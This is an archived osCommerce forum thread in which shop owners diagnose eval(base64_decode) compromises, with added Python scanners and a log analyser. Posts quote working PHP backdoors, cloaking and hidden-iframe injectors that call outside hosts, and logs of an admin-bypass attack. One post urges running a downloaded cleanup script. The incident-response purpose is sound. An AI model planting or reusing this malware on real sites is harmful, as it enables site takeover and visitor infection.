
osCommerce


eval(base64_decode Hack


FIMBLE


I don't have any of the base64 code in my site. What I do have is a .gla file which is creating links to who knows where, and there is a .temp folder with hundreds of files in it that I keep deleting and they keep coming back. Google has placed this site on the "could be dangerous" list. I moved the domain back to its old host that still had the old files, and it's still bad. It must have happened a while ago, or again...?

 

Help?


  • 3 weeks later...

I'm going to cry...

I didn't realise I got hacked until today, when I noticed some odd error on the homepage of my store. It seems as though the hack took place this afternoon.

 

I've now gone in and removed some binary files that I've never seen before, but now EVERY single one of my PHP files has this <?php /**/eval(base64_decode( blah blah in it.

 

I don't even know where to start and finish the deletion from in each file.

I'm by no means technical and so some of the posts I've been reading go over my head. I don't even know how to rename my admin folder, I'm guessing it's surely not quite as simple as right clicking and renaming?

 

I'm so gutted about this and seriously considering closing my site once and for all. That's twice I've been hacked now in the last 6 months. It's too frustrating.



FYI mainly

 

It seems by coincidence I noticed a file added today and it was an eval base 64 script.

It was in its own file called checkout_approve.php; the code never made it to any other pages.

 

I also found a file called bground1.gif-fix.by.php

It contained one line: if(isset($_POST['code'])) {if ($_POST['code']!='') {eval(stripslashes($_POST['code']));exit;}}echo '000huyasse';

 

Anyone know what that is?

My experience relates to osCommerce Online Merchant v2.2 RC2


A google search suggested to me that it's part of a larger hacking scheme.

 

You may have other hack files lurking in the shadows....


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

  • 4 weeks later...

I also found a file called bground1.gif-fix.by.php

It contained one line: if(isset($_POST['code'])) {if ($_POST['code']!='') {eval(stripslashes($_POST['code']));exit;}}echo '000huyasse';

 

Anyone know what that is?

 

Hope this will help out a little bit:

 

This code pretty much allows an external HTML page (a form) to insert PHP code into your script and actually execute it. It works like this: you create an HTML page, build in a form with a text field, call it 'code', and send it to this PHP file.

$_POST['code'] will contain the sent code and eval(stripslashes($_POST['code'])) will execute that code. It's a PHP backdoor to spy on your system, change system values and the like.

This 'hack' doesn't come with magic though:

in order to even insert those code lines into your files, the 'attacker' must have access (FTP or alike) to your server and write permission to those PHP files.

So the steps to clean up an infected system are: find out how the attacker accessed your system;

check your server log files (FTP transfer log files, for example, might prove valuable, as you can see which files were modified and where they are, and thus simply remove the malicious code lines and change the password for the FTP account used);

also make sure to check your own system for trojans/keyloggers, and the systems of everyone having access to that account.

If you can't keep the 'attacker' out of your system, there's no need to even clean up the code, as he'll just log on again and put it in again.

I personally am not too familiar with the osCommerce project, but a few general things:

It is important to always check user-inputted data. Never allow filesystem access with $_POST or $_GET submitted information; always hardcode filesystem links or at least check for valid input data with a switch/case.

Make sure the project does not rely on register_globals.

Make sure the project does not rely on eval (also no dynamically generated PHP code).

Always properly escape SQL data; if SQL data contains numbers, check that you really are handling numbers and nothing else.

If those few guidelines are followed, your scripts will be pretty much secure against most attacks/exploits.

Hope this might help out a little bit.

Thank you for reading.

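An added example (not code from the thread) for finding the two patterns described in this reply across a web root: eval(base64_decode(...)) with the payload embedded in the file, and eval(...$_POST...) taking its code from a request. It decodes embedded payloads for inspection so that lines like the ones quoted above can be triaged without executing them; the sample web root and its payload are constructed.

```python
import base64
import os
import re
import tempfile
import zlib

# Two signatures from this thread: eval() fed by base64_decode() (payload hidden in
# the file) and eval() fed straight from $_POST (a remote command backdoor).
EVAL_B64_RE = re.compile(
    r"""eval\s*\(\s*(?:"\?>"\s*\.\s*)?base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)"""
)
EVAL_POST_RE = re.compile(r"eval\s*\(\s*(?:stripslashes\s*\(\s*)?\$_(?:POST|GET|REQUEST)\b")

def decode_payload(b64):
    """Decode the hidden payload for triage; if it is not text, assume one layer of
    gzinflate() (raw DEFLATE) on top, a common variant of the same trick."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    try:
        text = raw.decode("utf-8")
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            return text
    except UnicodeDecodeError:
        pass
    try:
        return zlib.decompress(raw, -15).decode("utf-8", errors="replace")
    except zlib.error:
        return raw.decode("utf-8", errors="replace")

def scan_file(path):
    findings = []
    with open(path, encoding="utf-8", errors="replace") as f:
        src = f.read()
    for m in EVAL_B64_RE.finditer(src):
        findings.append({"file": path, "line": src.count("\n", 0, m.start()) + 1,
                         "kind": "eval-base64", "payload": decode_payload(m.group(1))})
    for m in EVAL_POST_RE.finditer(src):
        findings.append({"file": path, "line": src.count("\n", 0, m.start()) + 1,
                         "kind": "eval-post-backdoor", "payload": ""})
    return findings

def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk a web root and report every eval-based injection, sorted by file and line."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return sorted(findings, key=lambda f: (f["file"], f["line"]))

def build_sample_tree():
    """Constructed web root for the demo (placeholder payload, not real malware)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    hidden = base64.b64encode(b"echo '<!-- injected -->';").decode()
    files = {
        "includes/header.php": "<?php\n// legitimate code\n?>\n<?php /**/eval(base64_decode(\"%s\"));?>" % hidden,
        # the one-liner quoted earlier in the thread
        "images/bground1.gif-fix.by.php": "<?php if(isset($_POST['code'])) {if ($_POST['code']!='') {eval(stripslashes($_POST['code']));exit;}}echo '000huyasse'; ?>",
        # base64_decode without eval: legitimate use, must not be flagged
        "catalog/index.php": "<?php echo base64_decode('aGVsbG8='); ?>",
        "images/logo.gif": "GIF89a",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as f:
            f.write(body)
    return root

if __name__ == "__main__":
    for hit in scan_tree(build_sample_tree()):
        print(f"{hit['file']}:{hit['line']} {hit['kind']}")
        if hit["payload"]:
            print("   decoded:", hit["payload"])
```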

Hi, trying to follow this thread but completely new to code. I added an oscommerce cart (not live yet, in the process of customizing with the help of some of you!) to an existing joomla site that had been installed by someone else a while back.

 

Today I discovered an unrecognizable script, eval(base64_decode), at the end of several of the Joomla php files (hadn't looked at these files previously - could have been there for ???), and found this thread.

 

Here it is, decoded:

 

if (preg_match('/live|msn|yahoo|Google|ask|aol|bot|google/', $_SERVER['HTTP_USER_AGENT'])) {
    $get = "http://209.160.33.108/bot1.php?host=".$_SERVER['HTTP_HOST'];
    if (function_exists("curl_init")) {
        $c = curl_init();
        curl_setopt($c, CURLOPT_URL, $get);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
        $out = curl_exec($c);
        curl_close($c);
        echo $out;
    } else {
        $out = file_get_contents($get);
        echo $out;
    }
}

 

Basic Q's - is this malicious? What does it mean, what does it do, and how do I find the "source file"? If the script is in the Joomla files, does that mean I also have to replace osCommerce too? I was in the process of taking the security measures re osCommerce but had not yet done all of the steps.

 

Thanks. Sleepless. This is such a setback!!


  • 2 months later...

That code above redirects visitors from search engines to another site.

ATM I have deleted this weird script from a few websites now many times.

They all have the same thing in the log:

x.x.x.x - - [14/Jul/2010:01:39:16 +0300] "HEAD /admin/define_language.php/login.php HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [14/Jul/2010:01:39:17 +0300] "POST /admin/define_language.php/login.php?filename=cookie_usage.php&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [14/Jul/2010:01:39:17 +0300] "GET /cookie_usage.php?cookies=1 HTTP/1.1" 200 21058 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [16/Jul/2010:00:36:46 +0300] "HEAD /admin/define_language.php/login.php HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [16/Jul/2010:00:36:49 +0300] "POST /admin/define_language.php/login.php?filename=cookie_usage.php&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [16/Jul/2010:00:36:49 +0300] "GET /cookie_usage.php?cookies=1 HTTP/1.1" 200 21081 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [27/Jun/2010:18:39:26 +0300] "HEAD /admin/categories.php/login.php HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [27/Jun/2010:18:39:26 +0300] "POST /admin/categories.php/login.php?action=new_product_preview HTTP/1.1" 200 2185 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"

 

So it's not the FTP account that has been breached; it's XSS vulnerable.

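An added example (not from the thread) that runs detection over the log lines quoted above: it parses Apache combined-format lines, flags any request to an /admin script with a trailing PATH_INFO segment ('/admin/x.php/login.php' executes x.php while the URL ends in login.php), and pairs an action=save POST with the same client's later GET of the file named in filename=. The sixth sample line is a constructed benign hit; the others are copied from the post.

```python
import re
from collections import defaultdict

# Apache combined log format, as in the lines pasted above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# "/admin/x.php/login.php": the second ".php" segment is PATH_INFO, so the script
# that actually runs is x.php even though the request path ends in login.php.
PATHINFO_RE = re.compile(
    r"^(?P<script>/admin/[^/?]+\.php)/(?P<pathinfo>[^?]*\.php)(?:\?(?P<query>.*))?$"
)

# Constructed sample: five lines from the thread plus one ordinary visitor hit.
SAMPLE_LOG = [
    'x.x.x.x - - [14/Jul/2010:01:39:16 +0300] "HEAD /admin/define_language.php/login.php HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"',
    'x.x.x.x - - [14/Jul/2010:01:39:17 +0300] "POST /admin/define_language.php/login.php?filename=cookie_usage.php&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"',
    'x.x.x.x - - [14/Jul/2010:01:39:17 +0300] "GET /cookie_usage.php?cookies=1 HTTP/1.1" 200 21058 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"',
    'x.x.x.x - - [27/Jun/2010:18:39:26 +0300] "HEAD /admin/categories.php/login.php HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"',
    'x.x.x.x - - [27/Jun/2010:18:39:26 +0300] "POST /admin/categories.php/login.php?action=new_product_preview HTTP/1.1" 200 2185 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"',
    'x.x.x.x - - [14/Jul/2010:01:40:02 +0300] "GET /index.php HTTP/1.1" 200 14302 "-" "Mozilla/5.0 (constructed benign visitor)"',
]

def parse_line(line):
    """Split one combined-log line into its fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def query_params(query):
    return dict(p.split("=", 1) for p in (query or "").split("&") if "=" in p)

def analyze_log(lines):
    """Flag (1) every request to an /admin script carrying a PATH_INFO segment and
    (2) a GET of the file that an earlier action=save POST from the same client
    named in filename=, i.e. the attacker fetching the page it just overwrote."""
    findings = []
    written = defaultdict(set)   # client ip -> filenames it wrote via action=save
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        pi = PATHINFO_RE.match(rec["url"])
        if pi:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "kind": "admin-pathinfo",
                             "script": pi.group("script"), "status": rec["status"]})
            params = query_params(pi.group("query"))
            if rec["method"] == "POST" and params.get("action") == "save" and "filename" in params:
                written[rec["ip"]].add(params["filename"])
            continue
        path = rec["url"].split("?", 1)[0].lstrip("/")
        if rec["method"] == "GET" and path in written.get(rec["ip"], ()):
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "kind": "written-file-fetched",
                             "script": "/" + path, "status": rec["status"]})
    return findings

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['ts']}  {f['ip']:<10} {f['kind']:<22} {f['script']} -> {f['status']}")
```

A 200 on the HEAD to the admin script, rather than a redirect to the login page, is the detail a later reply in this thread points at: the script answered without a login.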

There seem to be a lot of different attacks using the "eval(base64_decode" technique.

 

I came across another example this week, here are a few details:

 

This string

 

<?php eval(base64_decode("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"));?>

 

was appended to files like includes/header.php and a couple of others, which executes the following code:

 

$z37="stats";
$h37="http";
$c37="com";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if ((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_COOKIE[$z37]))) {
    // search engine crawlers, and visitors who already carry the "stats" cookie, get nothing
} else {
    @setcookie($z37,md5("stats"),time()+10800);
    $url = @file_get_contents($h37."://".$c37.$c37.$c37.$c37.$c37.$c37.".$c37/"."in".".ph"."p?"."i=".$_SERVER["REMOTE_ADDR"]."&b=".urlencode($ua3)."&h=".urlencode($_SERVER["HTTP_HOST"]));
    if (strstr($url,"!go!")) {
        $url = explode("!go!",$url); $url = $url[1];
        echo $url;
    }
}

 

which sends the following request

 

http://comcomcomcomcomcom.com/in_dot_php?i=ip.ip.ip.ip&b=Midori%2F0.2.2+%28X11%3B+Linux+x86_64%3B+U%3B+en-gb%29+WebKit%2F531.2%2B&h=www.website.com

 

DON'T CLICK THIS LINK

 

where ip.ip.ip.ip was the website IP address and www.website.com the URL.

 

In other words, it requests the web page http://comcomcomcomcomcom.com/in.php (again, DON'T CLICK THIS LINK) with parameters of IP address, browser and server info, and domain.

 

The domain comcomcomcomcomcom.com was registered on Monday 13th Sep (the day of the attack) and WHOIS reveals that it is protected by privacyprotect.org.

 

Hope this helps!


  • 3 weeks later...

I also have been hacked and found the malicious code. I banned an IP address a few days ago from Russia. They were on my site 12 hours and looked suspicious.

 

I used the decode hack and it didn't work for me. Can someone tell me which files were planted and need to be removed?

 

What a mess, we work so hard to get our sites perfect, and also get top rankings, only to be hacked.

 

Weird thing is my site works just fine, but the code is in every php file, and the company forex is listed a million times behind each page in the body.


I was also hacked and it unfortunately went unnoticed as it did work fine most of the time. I used a search and replace and the code was found in 387 places. But just as important, in the image file there were "new files" that had either an index.php or htc access.php. There were also random php files throughout the image file. So be sure to check all of these files for anything unusual. I didn't find any in the download file (guess they hadn't got to that one). I blocked an IP address a few days ago from India, so it looks like this bot is from "around the world". Also, I missed this but my hosting co's security "fixed" it. I still had a random weird error, and what they found was a blank line at the end of the .php pages. So if after cleaning all the code you still have errors, check this too. Oh, PLEASE make a clean backup! I used the search and replace because I wanted to know how widespread this was (and it was layers deep). Good luck!


I just wanted to add a friend who hosts in NL got hacked, apparently they have been coming & going for almost a month now without her knowledge.

 

I just cleaned house there, drilling down through every folder, and here is what I found:

 

catalog/admin/includes/header.php REPLACED

catalog/admin/includes/languages/english/file_manager.php REMOVED

catalog/admin/includes/languages/german/file_manager.php REMOVED

catalog/images/default/one.php REMOVED

catalog/images/help.php REMOVED

catalog/images/PayPal_Fr_2010.zip REMOVED

catalog/includes/languages/dutch/cookie_usage.php REPLACED

catalog/templates/fallback/content/checkout_payment.tpl.php REPLACED

catalog/templates/OS03C00246/sub_header.php REPLACED

root/googlec27ee1f6f95b.php REMOVED

 

I'll be changing her passwords from here and having her go do a thorough scan of her system tonight, install KeyScrambler (which she is SUPPOSED to already have) and admonish her NOT to save passwords in the admin, FTP or hosting.

Debbie D
Franklin County, VA "Moonshine Capitol of the World"
osCmax Mobile Template oscmaxtemplates.com


I will add to that last post - I found two new login accounts on the admin side also - obviously I removed them.

 

I examined her logs as best I could, thankfully most of what I wanted was there.. these are the offending IPs

 

62.193.212.234

91.211.16.126

89.149.242.16


So I was hacked.

 

I downloaded all the files to my puter and deleted everything off the server. So I'm down.

I used Dreamweaver and searched the folder containing said files for "eval("?>".base64_decode(" and it came up with one file, aa.php. That file only contains that line of code.

 

1) Does that mean I am clean on the rest of the files? Or should I be looking for other malicious files?

2) I am very concerned about using osC going forward. The hosting company I use offers osC as an installable app, which is how I use it. They say it is version 2.2. I have seen on this site 2.2 XX. Where do I look to get the version of the osC I am using?

3) How do I go about getting someone to check out my store, if or when I get it back up, for any flaws or security risks? Once found, how about some help getting them fixed?


 

1. Not necessarily. You need to look through every folder to see if there are files that don't belong. One place they love to drop PHP files is the /catalog/images folder. What I suggest if your installation is stock, get a brand new copy and upload that. If the install is modified, then get a fresh copy and use a program like Beyond Compare (worth every dime), and compare a fresh with what you have. If that was the only string you searched for there could be others that refer to that, so it would not be found in a search.

 

2. Try looking in catalog\admin\includes\application_top.php:

    // Define the project version
    define('PROJECT_VERSION', 'osCMax v2.0.25');

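The "compare a fresh copy with what you have" approach from the reply above, as an added example (not the project's or the poster's code, and a minimal stand-in for the Beyond Compare workflow mentioned): it hashes both trees, lists modified, added and missing files, and separately flags any PHP file under an images directory, the drop location the reply names. The sample trees and their contents are constructed.

```python
import hashlib
import os
import tempfile

SCRIPT_EXTS = (".php", ".phtml", ".inc")
IMAGE_DIRS = {"images"}   # directories where no script should ever live

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def hash_tree(root):
    """Map each file's path relative to root (with / separators) to its SHA-256."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            digests[os.path.relpath(full, root).replace(os.sep, "/")] = sha256_file(full)
    return digests

def compare_trees(fresh_root, live_root):
    """Diff a pristine install against the live copy. 'added' needs manual triage
    (installer-written configuration and uploaded product images are legitimate
    additions); 'modified' and 'script_in_image_dir' almost never are."""
    fresh, live = hash_tree(fresh_root), hash_tree(live_root)
    report = {"modified": [], "added": [], "missing": [], "script_in_image_dir": []}
    for rel, digest in live.items():
        if rel not in fresh:
            report["added"].append(rel)
        elif fresh[rel] != digest:
            report["modified"].append(rel)
        parent_dirs = rel.lower().split("/")[:-1]
        if rel.lower().endswith(SCRIPT_EXTS) and IMAGE_DIRS.intersection(parent_dirs):
            report["script_in_image_dir"].append(rel)
    report["missing"] = sorted(rel for rel in fresh if rel not in live)
    for key in ("modified", "added", "script_in_image_dir"):
        report[key].sort()
    return report

def build_sample_trees():
    """Constructed fresh/live pair for the demo; the dropped file names echo the
    list posted earlier in the thread, their contents are placeholders."""
    fresh, live = tempfile.mkdtemp(prefix="fresh_"), tempfile.mkdtemp(prefix="live_")
    header = "<?php require('includes/application_top.php'); ?>\n"
    injected = header + '<?php /**/eval(base64_decode("PAYLOAD_PLACEHOLDER"));?>\n'
    fresh_files = {"index.php": "<?php echo 'shop'; ?>", "includes/header.php": header,
                   "includes/footer.php": "<?php ?>", "images/logo.gif": "GIF89a"}
    live_files = {"index.php": "<?php echo 'shop'; ?>", "includes/header.php": injected,
                  "images/logo.gif": "GIF89a", "images/help.php": "<?php /* dropped */ ?>",
                  "googlec27ee1f6f95b.php": "<?php /* dropped */ ?>"}
    for root, files in ((fresh, fresh_files), (live, live_files)):
        for rel, body in files.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as f:
                f.write(body)
    return fresh, live

if __name__ == "__main__":
    fresh_root, live_root = build_sample_trees()
    for key, paths in compare_trees(fresh_root, live_root).items():
        print(f"{key}: {paths}")
```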


62.193.212.234

91.211.16.126

89.149.242.16

 

I've seen that 2nd one (Ukraine) in my Apache logs before.

 

[Tue Jun 08 02:00:16 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

 

[Tue Jun 22 16:00:54 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

[Tue Jun 22 16:00:54 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

[Tue Jun 22 16:03:33 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

[Tue Jun 22 16:05:33 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

 

[Tue Sep 07 22:13:02 2010] [error] [client 91.211.16.126] client denied by server configuration: /var/www/vhosts/my_domain/httpdocs/catalog/admin

 

There are many more incidents, but notice that from September I've implemented a .htaccess rule that basically blocks Turkey, Russia and Ukraine, so I don't see them so often; but that IP is a multiple snoop!

 

Wayne.....


This 91.211.16.126 hacked my shop and I'm thinking about doing something against it.

They put many google................php files on the shop and as a result I get virus warnings.

Here are the details about this company:

 


If someone has the same problem, it will be fun to work together.

 

Maraika

 

 


 

 

You could try; I notice they don't have an abuse@ email address. In some cases you get a reply. I find it easier to just block/ban the whole country, I'm not really looking to do business there to be honest. Same applies to Turkey and to a lesser extent the Russian Federation.

 

They even paid a visit today.

 

[sun Oct 17 15:15:53 2010] [error] [client 91.211.16.126] client denied by server configuration: /var/www/vhosts/my_domain/httpdocs/

 

Slightly different approach to normal

 

91.211.16.126 - - [17/Oct/2010:15:15:53 +0100] "GET / HTTP/1.1" 403 5227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; WebMoney Advisor; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

 

Normal Modus operandi is looking for "admin" folder from a stock install.


 

They all have the same thing in the log:

x.x.x.x - - [14/Jul/2010:01:39:16 +0300] "HEAD /admin/define_language.php/login.php HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [14/Jul/2010:01:39:17 +0300] "POST /admin/define_language.php/login.php?filename=cookie_usage.php&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"

 

So it's not the FTP account that has been breached; it's XSS vulnerable.

 

It's more a case of stock "admin" vulnerable maybe? Error code "200" means it existed and the request was successful surely.


  • 7 months later...

Greetings,

I have read the entire thread, installed most of the contribs, however I'm still getting the eval64 issue in my index.php file in my store...

I have had it decoded and it looks like this.

Can I "deny" the IPs below in my htaccess file?

If so, how?

 

Many thanks

mike

 

error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
// visitors from these address ranges are treated as crawlers and are never served the iframe
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    array("64.68.80.0","64.68.87.255"),
    array("66.102.0.0","66.102.15.255"),
    array("64.233.160.0","64.233.191.255"),
    array("66.249.64.0","66.249.95.255"),
    array("72.14.192.0","72.14.255.255"),
    array("209.85.128.0","209.85.255.255"),
    array("198.108.100.192","198.108.100.207"),
    array("173.194.0.0","173.194.255.255"),
    array("216.33.229.144","216.33.229.151"),
    array("216.33.229.160","216.33.229.167"),
    array("209.185.108.128","209.185.108.255"),
    array("216.109.75.80","216.109.75.95"),
    array("64.68.88.0","64.68.95.255"),
    array("64.68.64.64","64.68.64.127"),
    array("64.41.221.192","64.41.221.207"),
    array("74.125.0.0","74.125.255.255"),
    array("65.52.0.0","65.55.255.255"),
    array("74.6.0.0","74.6.255.255"),
    array("67.195.0.0","67.195.255.255"),
    array("72.30.0.0","72.30.255.255"),
    array("38.0.0.0","38.255.255.255")
);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
    if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
// everyone not classified as a bot gets the hidden 1x1 iframe
if (!$bot) {
    echo '<iframe src="http://jlhhox.cz.cc/QQkFBwQBAgQHDAwHEkcJBQcEAQIEAAYBBw==" width="1" height="1"></iframe>';
}


forgot to say, quick update

I have added *.cz.cc to the deny in the htaccess, so far so good, band-aid fix I think. I can't find any more eval 64 in any other php file... fingers crossed while I lock down a little further.


  • 6 months later...

Hello guys, sadly my forum was victim of this kind of attack too. I don't know if this will help you, but it did for me (I'm talking about file clean-ups, large amounts of files).

 

http://imasdeweb.com/opensource/search_and_replace/search_and_replace.php.zip

 

Put this file in your root web folder and run it, it will fix all infected files and will make a backup too. To prevent this from happening again, put this in your php.ini and restart web server.

 

disable_functions = eval, base64_decode, gzinflate

 

Hope this will help someone in cleaning large amounts of files.


  • 3 months later...

@kelvinJA2

 

The only cleaning tool is YOU. You have to manually check each and every file for malicious content and also remove any anomalous files on your server.

 

 

 

Chris


Archived

This topic is now archived and is closed to further replies.
